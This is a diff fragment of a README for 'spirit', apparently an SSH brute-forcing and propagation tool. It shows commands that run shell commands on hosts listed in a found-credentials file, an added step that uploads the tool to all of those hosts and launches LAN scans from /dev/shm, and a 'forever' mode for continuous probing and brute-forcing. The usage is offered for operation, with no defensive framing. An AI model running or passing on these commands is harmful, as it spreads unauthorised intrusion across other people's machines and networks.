theaog/spirit/README.md

 # omni will automatically attempt to connect to hosts present in the found.lst file,
 # run commands on them and display the output to you.
 $ ./spirit omni -c 'whoami && uptime'
+# Upload spirit to all hosts and scan the LAN
+$ ./spirit omni -u ./spirit -c '/dev/shm/spirit scan --lan'
 ```

 > Tip: you can automate these steps with `./spirit forever` for continuous automatic probing on random ports & bruting. ![forever](asset/forever.png)